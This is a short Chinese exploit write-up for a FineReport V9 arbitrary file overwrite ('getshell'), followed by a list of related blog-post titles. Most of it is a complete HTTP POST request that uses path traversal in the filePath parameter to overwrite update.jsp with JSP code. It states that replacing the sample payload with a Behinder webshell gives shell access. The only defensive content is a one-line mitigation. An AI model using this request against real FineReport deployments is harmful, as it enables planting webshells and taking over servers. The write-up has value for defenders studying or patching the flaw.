帆软 V9 Getshell 漏洞
0x00 任意文件上传漏洞【FineReport V9】
0x01 漏洞描述
此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动帆软后默认存在的 JSP 文件
0x02 漏洞详情
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8Content-Length: 74{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}
payload 替换成冰蝎的马,即可getshell
0x03 临时修复建议
排查是否使用帆软系统,并同步在AF自定义禁止访问webroot/ReportServer路径。
帆软 V9 Getshell 漏洞相关推荐
- 帆软数据决策系统漏洞_帆软报表漏洞总结
一.帆软数据决策系统漏洞背景 FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件.主要针对2012年7.0版本存在一些安全漏洞问题. 二.帆软数据决策 ...
- 帆软 FineReport 动态列如何设置
最近有个需求是用采购的帆软报表来动态展示数据,记录下来,方便备查. 环境准备 帆软 FineReport V9.0 以用户信息统计表为例,具体操作步骤如下. 第一步.设置查询信息集 新建信息集 Dat ...
- PHPCMS v9 Getshell(Apache)
公开时间: 2013-03-04 简要描述: phpcms v9 getshell (apache) 详细说明: 漏洞文件:phpcms\modules\attachment\attachments. ...
- 帆软参数设置_帆软报表(finereport)参数组合/下拉参数联动
首先实现下拉参数联动 1.参数的定义→添加控件绑定数据→参数过滤和参数面板样式 下拉复选框控件注意事项: select * from table where 1=1 ${if(len(控件名称)=0, ...
- 帆软报表调用mysql存储过程_FineReport单行与数据库交互的方法
FineReport单行与数据库交互的方法 1. 问题描述 我们在做一张报表填报的时候经常会遇到需要在一行进行添加动作,将该行数据直接与数据库交互,执行存储过程过程.我们可以通过每一行增加帆软&q ...
- Typecho反序列化导致前台 getshell 漏洞复现
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...
- 帆软finereport实现动态切换分组和列表模式
首先简单说一下什么是帆软报表的"分组"还有"列表", 分组呢,就是这样: 列表呢,就是这样: 简单说,列表就是不合并重复的单元格了,分组就是自动把那些重复的单元 ...
- 使用帆软finereport实现跳转的一点心得
最近单位在用帆软做快速开发,我虽然比较熟悉JavaScript和HTML,自己从零开始造轮子效果可能更好,但是毕竟局里想要使用这个,又是团队项目,自然是能省事就省事一点,有得用就用吧,年纪大了,我也就 ...
- gis 大屏_gis大屏可视化应用技术方案_gis大屏可视化应用技术_gis大屏可视化应用 - 帆软...
如今大屏可视化的应用越来越普遍,在很多公共场合.交易大厅,以及企业的展览中心,大屏可视化都是非常震撼的.那么gis大屏可视化应用技术方案哪家公司靠谱?你需要掌握这2招选择标准. 一.gis大屏可视化应 ...
最新文章
- djc加密数字货币_中国银行原副行长: quot;网络加密币quot;难以成为货币,央行数字货币只能是法定货币的数字化...
- HDU-2476 String painter 区间DP
- 泛函分析——赋范线性空间定义的概念
- java假死_分析java进程假死
- linux下面拷贝pdf却没法在windows下面打开
- Ubuntu 设置下载路径
- JSONPath 解析 JSON 内容详解(翻译自 github)
- 风机桨叶故障诊断(三) 识别桨叶——初步构建BP神经网络
- 京东与中国石化全面深化战略合作 涉及能源供应服务等
- Oracle HTTP 乱码
- 纠错帖:Zuul Spring Cloud Gateway Linkerd性能对比
- SAP物料主数据随笔
- EM从最大似然到EM算法浅解
- oracle dblink 20001,解决ORA-02021: 不允许对远程数据库进行 DDL 操作下面通过DBLINK调用远程过程来执行这样的操作。...
- Atitit.线程 死锁 跑飞 的检测与自动解除 与手动解除死锁 java c# .net php javascript.
- CS231n Assignment1 Knn
- ICMP协议的作用是什么?
- c语言编程照抄能学好吗,电子信息类专业学生必看:一位老电子工程师十年感悟...
- 用go填写pdf模板
- GWT(Google Web Toolkit)是干嘛用的